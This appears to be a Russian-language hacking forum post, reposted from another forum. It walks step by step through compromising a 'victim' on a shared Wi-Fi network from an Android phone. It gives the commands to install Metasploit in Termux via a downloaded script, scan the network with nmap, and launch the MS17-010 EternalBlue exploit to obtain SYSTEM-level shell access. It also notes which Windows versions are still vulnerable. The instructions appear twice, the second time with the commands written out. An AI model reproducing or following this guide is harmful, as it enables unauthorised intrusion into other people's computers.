HHIDE_DUMP
Гость
H
HHIDE_DUMP
Гость
Наверное чуть опоздал, слил тему с stf.st, но в одно время она была без хайда и я эту тему выложили на другой форум. Так что пусть полежит в этом разделе, на данный момент хайд составляет 30 симпатий и 100 сообщений
1. Качаем Termux в Google Play.
2. Подключаемся к любой wi-fi сети к которой подключена наша жертва.
3. Приступаем, обновляем все пакеты командами
4. Качаем metasploit
5. Распаковываем его задавая права для распаковки
6. Запускаем установку
и ждём примерно 5 минут, зависит от вашего смартфона.
7. После установки метасплоита нам нужно узнать локальные IP компов в вашей сети, для этого воспользуемся nmap'ом (он понадобиться вам потом ещё во многом если я продолжу писать темы по Termux)
8. Установим nmap командой
и сразу после установки проверяем нашу сетку
Пример: nmap -sn 192.168.1.1/24 (адресс роутера узнаём командой arp и иногда этой же командой можно найти и компьютеры сразу, но бывает она не работает, поэтому пользуемся nmap'ом)
9. Узнаём свой ip дабы не ошибиться и не применить эксплоит на нас (хотя он в любом случае выдаст ошибку ибо мы со смартфона, а эксплоит для windows). Для про верки нашего ип используем ifconfig
10. Переходим в дерикторию с нужным нам эксплоитом
и командой ls смотрим список.
11. Нам нужен данный эксплоит eternalblue.rb, выбираем его командой
.
12. Так жертву нашли, свой ип знаем, эксплоит тоже нашли, можно приступать к атаке. Включаем метасплоит командой
13. Мы почти у финиша, включаем эксплоит
14. Подключаем IP жертвы
15. Самый лучший момент!!!
- и мы получаем доступ к компютеру от имени системы и находимся в командноой строке из котрой можем выполнять просто море действий с жертвой...
Ну вот такой небольшой гайд по данному эксплоиту, он не работает на Windows 10, есть некоторые ситуации в которых он работает, но после обновы осенью и отказа от SMB1 уязвимость перестала работать, если вы смотрели то самое видео овера то он назвал ту самую группу хакеров, благодаря которой эту уязвимость в винде начали резко госить. Но если винду не обновляли с лета 2017 или она пиратка, то уязвимость должна работать, на предидущих версиях работает всё стабильно.
Для последущего применения уязвимости нужно повторять лишь 9 12 13 14 15 шаги и частично 8 шаг, ну я думаю вы разберётесь дальше.
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
1. Качаем Termux в Google Play.
2. Подключаемся к любой wi-fi сети к которой подключена наша жертва.
3. Приступаем, обновляем все пакеты командами
Код:
apt-get update; pkg update; pkg curl update
Код:
curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
Код:
chmod 777 metasploit.sh
Код:
chmod 777 metasploit.sh
7. После установки метасплоита нам нужно узнать локальные IP компов в вашей сети, для этого воспользуемся nmap'ом (он понадобиться вам потом ещё во многом если я продолжу писать темы по Termux)
8. Установим nmap командой
Код:
apt-get install nmap
Код:
nmap -sn *адрес роутера*/24
9. Узнаём свой ip дабы не ошибиться и не применить эксплоит на нас (хотя он в любом случае выдаст ошибку ибо мы со смартфона, а эксплоит для windows). Для про верки нашего ип используем ifconfig
10. Переходим в дерикторию с нужным нам эксплоитом
Код:
cd metasploit-framework/modules/exploits/windows/smb
11. Нам нужен данный эксплоит eternalblue.rb, выбираем его командой
Код:
cp ms17_010_eternalblue.rb eternalblue.rb
12. Так жертву нашли, свой ип знаем, эксплоит тоже нашли, можно приступать к атаке. Включаем метасплоит командой
Код:
msfconsole
Код:
use exploits/windows/smb/eternalblue.rb
Код:
set RHOST *тут айпишник*
Код:
exploit
Ну вот такой небольшой гайд по данному эксплоиту, он не работает на Windows 10, есть некоторые ситуации в которых он работает, но после обновы осенью и отказа от SMB1 уязвимость перестала работать, если вы смотрели то самое видео овера то он назвал ту самую группу хакеров, благодаря которой эту уязвимость в винде начали резко госить. Но если винду не обновляли с лета 2017 или она пиратка, то уязвимость должна работать, на предидущих версиях работает всё стабильно.
Для последущего применения уязвимости нужно повторять лишь 9 12 13 14 15 шаги и частично 8 шаг, ну я думаю вы разберётесь дальше.